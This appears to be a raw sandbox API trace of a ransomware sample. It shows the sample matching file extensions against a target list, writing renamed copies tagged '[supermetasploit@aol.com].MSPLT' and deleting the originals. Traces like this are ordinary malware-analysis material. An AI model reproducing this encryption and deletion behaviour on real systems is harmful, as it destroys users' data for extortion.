[0168.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.615] lstrlenW (lpString=".doc") returned 4 [0168.615] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.615] lstrlenW (lpString=".docx") returned 5 [0168.615] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.615] lstrlenW (lpString=".pdf") returned 4 [0168.615] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.615] lstrlenW (lpString=".xls") returned 4 [0168.615] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.615] lstrlenW (lpString=".xlsx") returned 5 [0168.615] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.615] lstrlenW (lpString=".ppt") returned 4 [0168.615] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.615] lstrlenW (lpString=".zip") returned 4 [0168.615] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.615] lstrlenW (lpString=".rar") returned 4 [0168.615] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.615] lstrlenW (lpString=".bz2") returned 4 [0168.615] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.615] lstrlenW (lpString=".7z") returned 3 [0168.615] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.615] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.615] lstrlenW (lpString=".dbf") returned 4 [0168.616] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.616] lstrlenW (lpString=".1cd") returned 4 [0168.616] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.616] lstrlenW (lpString=".jpg") returned 4 [0168.616] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.616] lstrlenW (lpString=".doc") returned 4 [0168.616] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString=".docx") returned 5 [0168.616] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.616] lstrlenW (lpString=".pdf") returned 4 [0168.616] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString=".xls") returned 4 [0168.616] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString=".xlsx") returned 5 [0168.616] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.616] lstrlenW (lpString=".ppt") returned 4 [0168.616] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.616] lstrlenW (lpString=".zip") returned 4 [0168.616] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.616] lstrlenW (lpString=".rar") returned 4 [0168.616] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.616] lstrlenW (lpString=".bz2") returned 4 [0168.617] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.617] lstrlenW (lpString=".7z") returned 3 [0168.617] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.617] lstrlenW (lpString=".dbf") returned 4 [0168.617] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.617] lstrlenW (lpString=".1cd") returned 4 [0168.617] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 44 [0168.617] lstrlenW (lpString=".jpg") returned 4 [0168.617] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.617] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0168.617] lstrlenW (lpString="eula.rtf") returned 8 [0168.617] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0168.617] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=6309) returned 1 [0168.618] CloseHandle (hObject=0x2e8) returned 1 [0168.618] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 0x80 [0168.618] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0168.618] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0168.618] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0168.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0168.620] GetLastError () returned 0x0 [0168.620] ReadFile (in: hFile=0x2e8, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x18a5, lpOverlapped=0x0) returned 1 [0169.005] WriteFile (in: hFile=0x2ec, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x18b0, lpOverlapped=0x0) returned 1 [0169.007] ReadFile (in: hFile=0x2e8, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0169.007] WriteFile (in: hFile=0x2ec, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0169.007] SetEndOfFile (hFile=0x2ec) returned 1 [0169.007] CloseHandle (hObject=0x2ec) returned 1 [0169.012] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.012] SetEndOfFile (hFile=0x2e8) returned 1 [0169.013] CloseHandle (hObject=0x2e8) returned 1 [0169.014] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.014] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 1 [0169.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.014] lstrlenW (lpString=".doc") returned 4 [0169.014] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.014] lstrlenW (lpString=".docx") returned 5 [0169.014] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.014] lstrlenW (lpString=".pdf") returned 4 [0169.014] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString=".xls") returned 4 [0169.015] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.015] lstrlenW (lpString=".xlsx") returned 5 [0169.015] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.015] lstrlenW (lpString=".ppt") returned 4 [0169.015] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.015] lstrlenW (lpString=".zip") returned 4 [0169.015] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.015] lstrlenW (lpString=".rar") returned 4 [0169.015] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString=".bz2") returned 4 [0169.015] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString=".7z") returned 3 [0169.015] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.015] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.015] lstrlenW (lpString=".dbf") returned 4 [0169.015] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.015] lstrlenW (lpString=".1cd") returned 4 [0169.015] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.015] lstrlenW (lpString=".jpg") returned 4 [0169.015] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.015] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.015] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.015] lstrlenW (lpString=".doc") returned 4 [0169.016] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString=".docx") returned 5 [0169.016] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.016] lstrlenW (lpString=".pdf") returned 4 [0169.016] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString=".xls") returned 4 [0169.016] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.016] lstrlenW (lpString=".xlsx") returned 5 [0169.016] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.016] lstrlenW (lpString=".ppt") returned 4 [0169.016] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.016] lstrlenW (lpString=".zip") returned 4 [0169.016] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.016] lstrlenW (lpString=".rar") returned 4 [0169.016] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString=".bz2") returned 4 [0169.016] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString=".7z") returned 3 [0169.016] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.016] lstrlenW (lpString=".dbf") returned 4 [0169.016] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.016] lstrlenW (lpString=".1cd") returned 4 [0169.016] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.016] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 35 [0169.016] lstrlenW (lpString=".jpg") returned 4 [0169.017] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.017] Sleep (dwMilliseconds=0x64) [0169.252] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0169.252] lstrlenW (lpString="LocalizedData.xml") returned 17 [0169.253] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0169.747] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=86284) returned 1 [0169.747] CloseHandle (hObject=0x2d4) returned 1 [0169.747] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 0x80 [0169.747] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.760] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0169.760] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.760] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.760] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0169.760] GetLastError () returned 0x0 [0169.760] ReadFile (in: hFile=0x2d4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1510c, lpOverlapped=0x0) returned 1 [0169.778] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x15110, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x15110, lpOverlapped=0x0) returned 1 [0169.780] ReadFile (in: hFile=0x2d4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0169.781] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0169.781] SetEndOfFile (hFile=0x2f4) returned 1 [0169.781] CloseHandle (hObject=0x2f4) returned 1 [0169.794] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.794] SetEndOfFile (hFile=0x2d4) returned 1 [0169.796] CloseHandle (hObject=0x2d4) returned 1 [0169.796] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.796] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml")) returned 1 [0169.797] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.797] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.797] lstrlenW (lpString=".doc") returned 4 [0169.797] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.797] lstrlenW (lpString=".docx") returned 5 [0169.797] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.797] lstrlenW (lpString=".pdf") returned 4 [0169.797] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.797] lstrlenW (lpString=".xls") returned 4 [0169.797] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.797] lstrlenW (lpString=".xlsx") returned 5 [0169.797] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.797] lstrlenW (lpString=".ppt") returned 4 [0169.797] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.797] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.797] lstrlenW (lpString=".zip") returned 4 [0169.797] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.797] lstrlenW (lpString=".rar") returned 4 [0169.797] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.797] lstrlenW (lpString=".bz2") returned 4 [0169.798] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString=".7z") returned 3 [0169.798] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.798] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.798] lstrlenW (lpString=".dbf") returned 4 [0169.798] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.798] lstrlenW (lpString=".1cd") returned 4 [0169.798] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.798] lstrlenW (lpString=".jpg") returned 4 [0169.798] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.798] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.798] lstrlenW (lpString=".doc") returned 4 [0169.798] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString=".docx") returned 5 [0169.798] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.798] lstrlenW (lpString=".pdf") returned 4 [0169.798] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString=".xls") returned 4 [0169.798] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.798] lstrlenW (lpString=".xlsx") returned 5 [0169.798] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.798] lstrlenW (lpString=".ppt") returned 4 [0169.799] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.799] lstrlenW (lpString=".zip") returned 4 [0169.799] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.799] lstrlenW (lpString=".rar") returned 4 [0169.799] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.799] lstrlenW (lpString=".bz2") returned 4 [0169.799] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.799] lstrlenW (lpString=".7z") returned 3 [0169.799] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.799] lstrlenW (lpString=".dbf") returned 4 [0169.799] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.799] lstrlenW (lpString=".1cd") returned 4 [0169.799] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.799] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 44 [0169.799] lstrlenW (lpString=".jpg") returned 4 [0169.799] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.799] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0169.799] lstrlenW (lpString="LocalizedData.xml") returned 17 [0169.799] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0169.800] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=82962) returned 1 [0169.800] CloseHandle (hObject=0x2d4) returned 1 [0169.800] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 0x80 [0169.800] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.800] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0169.800] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.800] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.800] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0169.801] GetLastError () returned 0x0 [0169.801] ReadFile (in: hFile=0x2d4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x14412, lpOverlapped=0x0) returned 1 [0169.836] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x14420, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x14420, lpOverlapped=0x0) returned 1 [0169.838] ReadFile (in: hFile=0x2d4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0169.839] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0169.839] SetEndOfFile (hFile=0x2f4) returned 1 [0169.839] CloseHandle (hObject=0x2f4) returned 1 [0169.849] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0169.849] SetEndOfFile (hFile=0x2d4) returned 1 [0169.851] CloseHandle (hObject=0x2d4) returned 1 [0169.851] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.851] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 1 [0169.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.852] lstrlenW (lpString=".doc") returned 4 [0169.852] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.852] lstrlenW (lpString=".docx") returned 5 [0169.852] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.852] lstrlenW (lpString=".pdf") returned 4 [0169.852] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0169.852] lstrlenW (lpString=".xls") returned 4 [0169.852] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0169.852] lstrlenW (lpString=".xlsx") returned 5 [0169.852] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0169.852] lstrlenW (lpString=".ppt") returned 4 [0169.852] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0169.852] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.852] lstrlenW (lpString=".zip") returned 4 [0169.852] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0169.852] lstrlenW (lpString=".rar") returned 4 [0169.852] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0169.852] lstrlenW (lpString=".bz2") returned 4 [0169.852] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0169.852] lstrlenW (lpString=".7z") returned 3 [0169.853] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0169.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.853] lstrlenW (lpString=".dbf") returned 4 [0169.853] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.853] lstrlenW (lpString=".1cd") returned 4 [0169.853] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.853] lstrlenW (lpString=".jpg") returned 4 [0169.853] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.853] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0169.853] lstrlenW (lpString=".doc") returned 4 [0169.853] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0169.853] lstrlenW (lpString=".docx") returned 5 [0169.853] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0169.853] lstrlenW (lpString=".pdf") returned 4 